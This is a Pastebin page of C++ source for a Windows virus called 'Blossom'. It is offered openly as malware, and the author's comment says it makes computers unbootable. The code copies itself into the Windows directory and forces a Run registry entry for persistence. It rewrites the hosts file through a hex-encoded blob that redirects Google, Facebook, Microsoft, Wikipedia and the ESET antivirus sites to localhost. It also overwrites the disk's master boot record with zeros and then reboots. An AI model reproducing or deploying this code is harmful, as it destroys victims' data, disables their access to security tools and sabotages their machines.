Advertisement
FlyFar

Blossom - C++ Virus Source Code

Jan 22nd, 2023
1,126
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 2.87 KB | Cybersecurity | 0 0
  1. #include <Windows.h>
  2.  
  3. DWORD WINAPI CheckTime(){
  4. DWORD write;
  5. SYSTEMTIME st;
  6. char data[512];
  7. ZeroMemory(&data,sizeof(data));
  8. GetLocalTime(&st);
  9. if(st.wYear==2014){
  10. HANDLE disk=CreateFile("\\\\.\\PhysicalDrive0",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);
  11. WriteFile(disk,data,512,&write,NULL);
  12. CloseHandle(disk);
  13. MessageBox(0,"Time to die now!","You have been hacked!",MB_ICONWARNING);
  14. ExitWindowsEx(EWX_REBOOT,0);
  15. }
  16. return 0;
  17. }
  18.  
  19. DWORD WINAPI hosts(){
  20. char data[]={0x77,0x77,0x77,0x2E,0x79,0x6F,0x75,0x74,0x75,0x62,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x67,0x6F,0x6F,0x67,0x6C,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x79,0x61,0x68,0x6F,0x6F,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x66,0x61,0x63,0x65,0x62,0x6F,0x6F,0x6B,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x6D,0x69,0x63,0x72,0x6F,0x73,0x6F,0x66,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x65,0x75,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x65,0x6E,0x2E,0x77,0x69,0x6B,0x69,0x70,0x65,0x64,0x69,0x61,0x2E,0x6F,0x72,0x67,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31};
  21. char path[60];
  22. DWORD write;
  23. GetEnvironmentVariable("windir",path,sizeof(path));
  24. strcat(path,"\\system32\\drivers\\etc\\hosts");
  25. HANDLE hFile=CreateFile(path,GENERIC_ALL,0,NULL,CREATE_ALWAYS,0,NULL);
  26. WriteFile(hFile,data,sizeof(data),&write,NULL);
  27. CloseHandle(hFile);
  28. return 0;
  29. }
  30.  
  31. DWORD WINAPI reg(){
  32. char value[]="hana.exe";
  33. HKEY hKey;
  34. while(1){
  35. RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
  36. RegSetValueEx(hKey,"Hana",0,REG_SZ,(LPBYTE)value,60);
  37. RegCloseKey(hKey);
  38. Sleep(10000);
  39. }
  40. return 0;
  41. }
  42.  
  43. int WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR cmd,int show){
  44. char file[MAX_PATH];
  45. char path[60];
  46. HANDLE hToken;
  47. LUID luid;
  48. LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&luid);
  49. TOKEN_PRIVILEGES tp;
  50. tp.Privileges[0].Luid=luid;
  51. tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
  52. tp.PrivilegeCount=1;
  53. OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken);
  54. AdjustTokenPrivileges(hToken,false,&tp,sizeof(tp),NULL,NULL);
  55. GetModuleFileName(NULL,file,sizeof(file));
  56. GetEnvironmentVariable("windir",path,60);
  57. strcat(path,"\\hana.exe");
  58. CopyFile(file,path,false);
  59. CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)reg,NULL,0,NULL);
  60. CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)hosts,NULL,0,NULL);
  61. while(1){
  62. CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)CheckTime,NULL,0,NULL);
  63. Sleep(10000);
  64. }
  65. return 0;
  66. }
Advertisement
Comments
  • FlyFar
    1 year
    # text 0.10 KB | 0 0
    1. Every 2014, the virus overwrite the MBR of the hard disk with zeros, causing the computer unable to boot.
Add Comment
Please, Sign In to add comment
Advertisement